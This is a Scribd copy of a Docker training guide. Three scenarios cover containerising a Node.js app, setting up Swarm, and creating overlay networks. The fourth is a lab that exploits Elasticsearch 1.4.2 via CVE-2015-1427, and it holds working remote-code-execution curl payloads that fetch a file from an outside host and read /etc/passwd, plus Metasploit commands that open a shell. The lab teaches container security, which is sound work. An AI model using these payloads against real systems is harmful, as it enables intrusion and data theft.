0% found this document useful (0 votes)
42 views14 pages

357 Scenarios v1.0

The document provides steps to deploy a Node.js and Express.js application as a Docker container using Docker Swarm for orchestration. It describes creating a Dockerfile to define the application image, building the image, running a container from the image locally, initializing a Docker Swarm cluster on one node, joining additional nodes to the cluster, creating an overlay network for container communication across nodes, and deploying the application as a replicated service on the Swarm cluster.

Uploaded by

GR Jesus
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
42 views14 pages

357 Scenarios v1.0

The document provides steps to deploy a Node.js and Express.js application as a Docker container using Docker Swarm for orchestration. It describes creating a Dockerfile to define the application image, building the image, running a container from the image locally, initializing a Docker Swarm cluster on one node, joining additional nodes to the cluster, creating an overlay network for container communication across nodes, and deploying the application as a replicated service on the Swarm cluster.

Uploaded by

GR Jesus
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 14

Docker Training and Certification www.edureka.

co/docker-training

Docker - Scenarios

A step by step guide

© Brain4ce Education Solutions Pvt. Ltd.


Step by Step Guide www.edureka.co/docker-training

. 1. Deploying Node.js and Express.js as a Docker


Container

In this scenario, you'll learn how to deploy a Node.js web application with Express.js as a
Docker Container.

Step 1 - Dockerfile - Base Image


To run an application inside of a container you first need to build the Docker Image. The
Docker Image should contain everything required to start your application, including
dependencies and configuration.
Docker Images are created based on a Dockerfile. A Dockerfile is a list of instructions that
define how to build and start your application. During the build phase, these instructions are
executed. The Dockerfile allows image creation to be automated, repeatable and consistent.
The first part of a Dockerfile is to define the base image. Docker has an embrace and
extends approach. Your Dockerfile should only describe the steps required for your
application. All runtime dependencies, such as Node.js, should be in the base image. The
use of base images improves the build time and allows the image to be shared across
multiple projects.

Task
Start writing the Dockerfile by defining the base image in the editor.
FROM ocelotuproar/alpine-node:5.7.1

Step 2 - Dockerfile – Dependencies


The next stage of the Dockerfile is to define the dependencies the application requires to
start.
The RUN instruction executes the command, similar to launching it from the bash command
line. The WORKDIR instruction defines the working directory where commands should be
executed from. The COPY instruction copies files and directories from the build directory
into the container image. This is used to copy the source code into the image, allowing the
build to take place inside the image itself.
All the commands are run in order. Under the covers, Docker is starting the container,
running the commands, and then saving the image for the next command.

©Brain4ce Education Solutions Pvt. Ltd Page 1


Step by Step Guide www.edureka.co/docker-training

Task
Continue creating the Dockerfile by defining the directory and how to download and
configure the dependencies.
RUN mkdir -p /usr/src/app
WORKDIR /usr/src/app

COPY package.json /usr/src/app/


RUN npm install

Step 3 - Dockerfile – Application


Once the Dockerfile has the required dependencies it now needs to define how to build and
run your application.
The EXPOSE instruction is a description about what ports the application is listening on.
This helps describe how the application should be started and run in production. This can be
considered part of the documentation, or metadata, about the image and application.
The CMD instruction defines the default command to run when the Docker Container is
started. This can be overridden when starting the container.

Task
Continue creating the Dockerfile by defining the directory and how to download and
configure the dependencies.
COPY . /usr/src/app
EXPOSE 3000
CMD [ "npm", "start" ]
cat package.json

Step 4 - Build
With the Dockerfile created, you can use the Docker CLI to build the image.

Task
Create a Docker Image by building and executing the Dockerfile using the Docker CLI.
When creating the image we also define a friendly name and tag. The name should refer to
the application, in this case aspnet. The tag is a string and commonly used as a version
number, in this case it's v0.1.
docker build -t nodejs-app:v0.1 .

You can view the Docker Images on your host using docker images | head -n2
Try breaking the build and see what happens.

©Brain4ce Education Solutions Pvt. Ltd Page 2


Step by Step Guide www.edureka.co/docker-training

Step 5 – Run
Once the Docker Image has been built you can be launch it in the same way as other
Docker Images.

Task
Start the newly build image and expose the port 3000 so the web application can be
accessed.
docker run -d \ -t -p 3000:3000 \ --name app \ nodejs-app:v0.1

Once the container and process has started you can use curl to access the running
application.
You can view the application logs using docker logs app
curl http://docker:3000

You've now successfully built a Node.js application as a Docker Image.

©Brain4ce Education Solutions Pvt. Ltd Page 3


Step by Step Guide www.edureka.co/docker-training

2. Docker Orchestration - Getting Started with Swarm


Mode
In this scenario, you will learn how to initialise a Docker Swarm Mode cluster and deploy
networked containers using the built-in Docker Orchestration.

Docker Swarm Mode introduces three new concepts which we'll explore in this scenario.

• Node: A Node is an instance of the Docker Engine connected to the Swarm.


Nodes are either managers or workers. Managers schedules which containers to
run where. Workers execute the tasks. By default, Managers are also workers.
• Services: A service is a high-level concept relating to a collection of tasks to be
executed by workers. An example of a service is an HTTP Server running as a
Docker Container on three nodes.
• Load Balancing: Docker includes a load balancer to process requests across all
containers in the service.

©Brain4ce Education Solutions Pvt. Ltd Page 4


Step by Step Guide www.edureka.co/docker-training

Step 1 - Initialise Swarm Mode

Turn single host Docker host into a Multi-host Docker Swarm Mode. Becomes Manager By
default, Docker works as an isolated single-node. All containers are only deployed onto the
engine. Swarm Mode turns it into a multi-host cluster-aware engine.
The first node to initialise the Swarm Mode becomes the manager. As new nodes join the
cluster, they can adjust their roles between managers or workers. You should run 3-5
managers in a production environment to ensure high availability.

Task: Create Swarm Mode Cluster


Swarm Mode is built into the Docker CLI. You can find an overview the possibility
commands via docker swarm --help
The most important one is how to initialise Swarm Mode. Initialisation is done via init.
docker swarm init

After running the command, the Docker Engine knows how to work with a cluster and
becomes the manager. The results of an initialisation is a token used to add additional
nodes in a secure fashion. Keep this token safe and secure for future use when scaling your
cluster.
In the next step, we will add more nodes and deploy containers across these hosts.

Step 2 - Join Cluster


With Swarm Mode enabled, it is possible to add additional nodes and issues commands
across all of them. If nodes happen to disappear, for example, because of a crash, the
containers which were running on those hosts will be automatically rescheduled onto other
available nodes. The rescheduling ensures you do not lose capacity and provides high-
availability.
On each additional node, you wish to add to the cluster, use the Docker CLI to join the
existing group. Joining is done by pointing the other host to a current manager of the cluster.
In this case, the first host.
Docker now uses an additional port, 2377, for managing the Swarm. The port should be
blocked from public access and only accessed by trusted users and nodes. We recommend
using VPNs or private networks to secure access.

©Brain4ce Education Solutions Pvt. Ltd Page 5


Step by Step Guide www.edureka.co/docker-training

Task
The first ask is to obtain the token required to add a worker to the cluster. For demonstration
purposes, we'll ask the manager what the token is via swarm join-token. In production, this
token should be stored securely and only accessible by trusted individuals.
token=$(docker -H 172.17.0.31:2345 swarm join-token -q worker) && echo $token

On the second host, join the cluster by requesting access via the manager. The token is
provided as an additional parameter.
docker swarm join 172.17.0.31:2377 --token $token

By default, the manager will automatically accept new nodes being added to the cluster.
You can view all nodes in the cluster using docker node ls

Step 3 - Create Overlay Network


Swarm Mode also introduces an improved networking model. In previous versions, Docker
required the use of an external key-value store, such as Consul, to ensure consistency
across the network. The need for consensus and KV has now been incorporated internally
into Docker and no longer depends on external services.
The improved networking approach follows the same syntax as previously.
The overlay network is used to enable containers on different hosts to communicate. Under
the covers, this is a Virtual Extensible LAN (VXLAN), designed for large scale cloud based
deployments.

Task
The following command will create a new overlay network called skynet. All containers
registered to this network can communicate with each other, regardless of which node they
are deployed onto.
docker network create -d overlay skynet

©Brain4ce Education Solutions Pvt. Ltd Page 6


Step by Step Guide www.edureka.co/docker-training

Step 4 - Deploy Service


By default, Docker uses a spread replication model for deciding which containers should run
on which hosts. The spread approach ensures that containers are deployed across the
cluster evenly. This one of the nodes are removed from the cluster, the containers running
are spread across the other nodes available.
A new concept of Services is used to run containers across the cluster. This is a higher-level
concept than containers. A service allows you to define how applications should be
deployed at scale. By updating the service, Docker updates the container required in a
managed way.

Task
In this case, we are deploying the Docker Image katacoda/docker-http-server. We are
defining a friendly name of a service called http and that it should be attached to the newly
created skynet network.
For ensuring replication and availability, we are running two instances, of replicas, of the
container across our cluster.
Finally, we load balance these two containers together on port 80. Sending an HTTP
request to any of the nodes in the cluster will process the request by one of the containers
within the cluster. The node which accepted the request might not be the node where the
container responses. Instead, Docker load-balances requests across all available
containers.
docker service create --name http --network skynet --replicas 2 -p 80:80
katacoda/docker-http-server

You can view the services running on the cluster using the CLI command docker service ls
As containers are started you will see them using the ps command. You should see one
instance of the container on each host.
List containers on the first host - docker ps
List containers on the second host - docker ps
If we issue an HTTP request to the public port, it will be processed by the two
containers curl docker.

©Brain4ce Education Solutions Pvt. Ltd Page 7


Step by Step Guide www.edureka.co/docker-training

Step 5 - Inspect State


The Service concept allows you to inspect the health and state of your cluster and the
running applications.

Task
You can view the list of all the tasks associated with a service across the cluster. In this
case, each task is a container docker service ps http
You can view the details and configuration of a service via docker service inspect --pretty
http

On each node, you can ask what tasks it is currently running. Self refers to the manager
node Leader: docker node ps self
Using the ID of a node you can query individual hosts docker node ps $(docker node ls -q |
head -n1)

In the next step, we will scale the service to run more instances of the container.

Step 6 - Scale Service


A Service allows us to scale how many instances of a task is running across the cluster. As
it understands how to launch containers and which containers are running, it can easily
start, or remove, containers as required. At the moment the scaling is manual. However, the
API could be hooked up to an external system such as a metrics dashboard.

Task
At present, we have two load-balanced containers running, which are processing our
requests curl docker
The command below will scale our http service to be running across five containers.
docker service scale http=5

On each host, you will see additional nodes being started docker ps
The load balancer will automatically be updated. Requests will now be processed across the
new containers. Try issuing more commands via curl docker
The result of this scenario is a two-node Swarm Mode cluster which can run load-balanced
containers that can be scaled up and down.

©Brain4ce Education Solutions Pvt. Ltd Page 8


Step by Step Guide www.edureka.co/docker-training

3. Docker Orchestration - Create Overlay Network


Learn how to use Overlay Networks as part of Swarm Mode. Overlay networks allow
containers to communicate as if they're on the same host. Under the covers they use VxLan
features of the Linux Kernel.

Step 1 - Initialise Swarm Mode


By default, Docker works as an isolated single-node. All containers are only deployed onto
the engine. Swarm Mode turns it into a multi-host cluster-aware engine.

Task: Initialise Swarm Mode


To use the secrets functionality, Docker has to be in "Swarm Mode". This is enabled
via docker swarm init

Join Swarm Mode


Execute the command below on the second host to add it as a worker to the cluster.
token=$(docker -H 172.17.0.18:2345 swarm join-token -q worker) && docker swarm join
172.17.0.18:2377 --token $token

Step 2 - Create Network


Overlay Networks are created using the Docker CLI, similar to creating a bridge network for
connecting between hosts. When creating the network, a driver type of overlay is used.
When new services are deployed via Swarm Mode, they can utilise this network allowing
containers to communicate.

Task
To create the Overlay Network, use the CLI and define the driver. Networks can only be
created via a Swarm Manager node. The network name would be app1-network.
docker network create -d overlay app1-network

All the networks can be viewed using:


docker network ls

©Brain4ce Education Solutions Pvt. Ltd Page 9


Step by Step Guide www.edureka.co/docker-training

Note: It's expected for the network not to appear on the worker nodes. The managers node
handles network creation and services being deployed.
docker network ls

Step 3 - Deploy Backend


Once the network has been created, services can be deployed and able to communicate
with other containers on the network.

Task
The following will deploy a Redis service using the network. The name of the service will
be redis that can be used for discovery via DNS.
docker service create --name redis --network app1-network redis:alpine

The next step will deploy a web app on a different node that will interact with Redis over the
network.

Step 4 - Deploy Frontend


With the overlay network and Redis deployed, it's now possible to deploy a Web App to use
Redis to persist data. The application is configured to look up Redis via DNS. The app is
configured to listen on port 3000, but the service will be exposed to the public on port 80.

Task
Create the new service will the command below:
docker service create \ --network app1-network -p 80:3000 \ --replicas 1 --name ap With
a two-node deployment, each container will be deployed onto different hosts.
docker ps

They'll use the overlay network and DNS discovery to communicate.

Test
Sending a HTTP request will persist the IP of the client in Redis.
curl docker

©Brain4ce Education Solutions Pvt. Ltd Page 10


Step by Step Guide www.edureka.co/docker-training

4. Docker Security - Hack ElasticSearch container

Running applications vulnerable to security exploits can expose your system to hackers.
This could result in downtime, data loss or important information disclosure that can have in-
reversal impact on a company.
In this scenario, you'll see how easy it is for hackers to break into applications using curl
commands. The scenario uses an older version of Elasticsearch which was vulnerable to a
remote exploit and detailed in CVE-2015-1427.

Step 1 - Start Container


To start we'll launch a container running Elasticsearch 1.4.2 which we'll later exploit.

Task
Launch the container
docker run -d -p 9200:9200 --name es benhall/elasticsearch:1.4.2

Container Security
By default, Docker drops certain Linux capabilities and blocks syscalls to add a default level
of security. As a result, the harder is isolated and the host protect from certain attack angles
a hacker might use.

Step 2 - Exploit Container


This particular exploit took advantage of the Elasticsearch search capabilities. In order for
the attack to work is requires data.

Insert Data
Use cURL to add a record. ElasticSearch can take a minute to launch, so you may find it's
not listening yet.
curl -XPUT 'http://docker:9200/twitter/user/kimchy1' -d '{ "name" : "Shay Banon" }'

©Brain4ce Education Solutions Pvt. Ltd Page 11


Step by Step Guide www.edureka.co/docker-training

Exploit via CVE-2015-1427


With data inserted, we can now exploit the database. An empty instance is not vulnerable to
the problem.
This particular version of Elasticsearch (1.4.2) allowed Java code to be used as part of the
search. While whitelisting existed, there are other ways to gain access to the Java API
required to potentially case damage.
In this case we're using Java to get access to the Operating System name.
curl http://docker:9200/_search?pretty -XPOST -d '{"script_fields": {"myscript":
{"script":
"java.lang.Math.class.forName(\"java.lang.System\").getProperty(\"os.name\")"}}}'

This command makes external HTTP requests to download additional files. HTTPBin echos
the results on the HTTP request, but this could be additional applications to launch
additional attacks.
curl http://docker:9200/_search?pretty -XPOST -d '{"script_fields": {"myscript":
{"script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"wget
-O /tmp/testy http://httpbin.org/get\")"}}}'

Once the process has been started, we can read the file off disk.
curl http://docker:9200/_search?pretty -XPOST -d '{"script_fields": {"myscript":
{"script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat
/tmp/testy\").getText()"}}}'

We can also read potentially sensitive files such as a passwd.


curl http://docker:9200/_search?pretty -XPOST -d '{"script_fields": {"myscript":
{"script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat
/etc/passwd\").getText()"}}}'

Because we're running inside a container this won't expose information from our host. This
default Docker security gives us huge advantages over running directly on the host.

Step 3 - Metasploit
The Metasploit Project is a computer security project that provides information about
security vulnerabilities and aids in penetration testing and IDS signature development.
Metasploit is a collection of exploits that can be used to test vulnerabilities.

Start Metasploit
docker run -it --link es:es --entrypoint bash benhall/metasploit

Fix launch script and start (it can take a few moments to initialise, create the database
schema and load the framework).
chmod +x start.sh && ./start.sh

©Brain4ce Education Solutions Pvt. Ltd Page 12


Step by Step Guide www.edureka.co/docker-training

Exploit ES via Metasploit


use exploit/multi/elasticsearch/search_groovy_script

set TARGET 0

set RHOST es

exploit

You have shell access to ES container!


ls

ls /

In this scenario, we demonstrated how easy it could be for attackers to break into
applications running inside a container. By default, Docker's security protects the host and
system and exposing information such as .ssh keys or passwords.
However, it demonstrates that people still need to be aware of which version of software
they're running and potential vulnerabilities which is may contain. Docker's security gives
you a greater level of protection than running the process on the host, however there still
needs to be a strong security practice in place.

©Brain4ce Education Solutions Pvt. Ltd Page 13

You might also like